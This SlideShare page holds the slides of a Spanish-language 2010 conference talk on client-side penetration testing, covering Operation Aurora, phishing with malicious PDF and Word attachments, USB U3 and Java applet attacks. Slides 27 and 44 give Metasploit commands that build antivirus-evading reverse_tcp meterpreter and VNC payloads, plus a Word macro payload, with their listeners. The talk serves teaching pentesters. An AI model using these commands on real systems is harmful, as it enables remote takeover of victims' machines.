What works on client side pentesting

1,653 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,653
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
101
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

What works on client side pentesting

  1. 1. What Work’s On Client Side Pentesting CAMPUS PARTY COLOMBIA 2010 I’m a Pentester I’m a User
  2. 2. Leonardo Pigñer www.base4sec.com @base4sec
  3. 3. iLife kungfoosion.com @kfs lpigner@base4sec.com www.linkedin.com/in/lpigner
  4. 4. ekoparty.org 16-17 Septiembre 2010
  5. 5. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  6. 6. ¿ Por Qué Client Side ?
  7. 7. DIFERENTES TIPOS DE PENETRATION TESTING No! Yo tengo Jodanse! Wardialing un 0-day para Yo entro es lo mejor! IIS 6.0! caminando Phone Attacker Network Attacker Social Engineer
  8. 8. INTERNET ATACANTE Firewall DMZ LAN SMTP WWW DOMINIO BASE DE DATOS
  9. 9. INTERNET ATACANTE Web App FW IPS Firewall Reverse Proxy DMZ IDS LAN SMTP WWW DOMINIO BASE DE DATOS
  10. 10. INTERNET Firewall DMZ LAN
  11. 11. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  12. 12. La Operación Aurora
  13. 13. 12 de Enero de 2010 “ataques altamente sofisticados y dirigidos ... originados desde China” [2] Google Blog: A new approach to China
  14. 14. + 30 [1] Wikipedia: Operation Aurora
  15. 15. “Operación Aurora”
  16. 16. Google se va de China (?)
  17. 17. Google.cn
  18. 18. Google.com.ar
  19. 19. “illegal flower tribute” [4] Wikipedia: Illegal flower tribute
  20. 20. PDF, DOC, XLS, CAD, E-mail Texas y el resto... Taiwan AR ,R C AB [3] Mandiant M-Trends “the advanced persistent threat”
  21. 21. 0-day para IE 6-7-8 - 12 de Enero: Anuncio de Google - 14 de Enero: Exploit en Wepawet - 14 de Enero: Advisory de Microsoft - 15 de Enero: PoC de MetaSploit - 21 de Enero: Microsoft update (fuera de ciclo) [6] Wepawet exploit [7] German government warns against using MS Explorer
  22. 22. www DEMO #1 “Aurora” Mas información en: KUNGFOOSION: Estalló la CyberGuerra!
  23. 23. OSVDB 61697 This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited. Afecta a: - Internet Explorer 6 - Internet Explorer 7 - Internet Explorer 8
  24. 24. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  25. 25. Distribución y Ataques
  26. 26. payload + encoding
  27. 27. DEMO #2 “Payload + Encoding” ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 X > payload_1.exe ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/ shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/ call4_dword_xor -c 3 -t exe -o payload_2.exe ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/ reverse_tcp LHOST=192.168.162.138 LPORT=443 E
  28. 28. Tienes un E-Mail
  29. 29. CASO de ESTUDIO (?)
  30. 30. 25000 mails 1883 interesados
  31. 31. Browsers
  32. 32. Sistema Operativo
  33. 33. Soporte de Java
  34. 34. Versiones de Flash
  35. 35. Abre mi adjunto! Tienes un E-Mail
  36. 36. Archivos Mas Utilizados 3% 38% 47% 7% 4% DOC XLS PPT PDF otros
  37. 37. 2008 1968 2009 2195 2010 895 [8] PDF Based Target Attacks are Increasing
  38. 38. DEMO #3 “PDF Exploit” Mas información en: KUNGFOOSION: Explotando el 0-day de Adobe Reader
  39. 39. OSVDB 61697 This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code. Afecta a: - Adobe Reader 8.1.2
  40. 40. +EXE DEMO #4 “PDF + EXE” Mas información en: KUNGFOOSION: Embebiendo un Ejecutable dentro de un PDF con MetaSploit
  41. 41. + EXE
  42. 42. 2008 1968 2009 2195 2010 895 [8] PDF Based Target Attacks are Increasing
  43. 43. DEMO #5 “Word”
  44. 44. DEMO #5 “Word” ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 V > macro_word.bas ./msfcli exploit/multi/handler PAYLOAD=windows/ vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 E
  45. 45. La Recepcionista
  46. 46. DEMO #6 “USB U3” Mas información en: KUNGFOOSION: Ataque USB U3 con MetaSploit
  47. 47. SET social engineering toolkit “The Java Applet Attack” Mas información en: KUNGFOOSION: Ingeniería Social con Applets firmados de Java en MetaSploit
  48. 48. Gracias! kungfoosion.com @kfs lpigner@base4sec.com www.linkedin.com/in/lpigner

×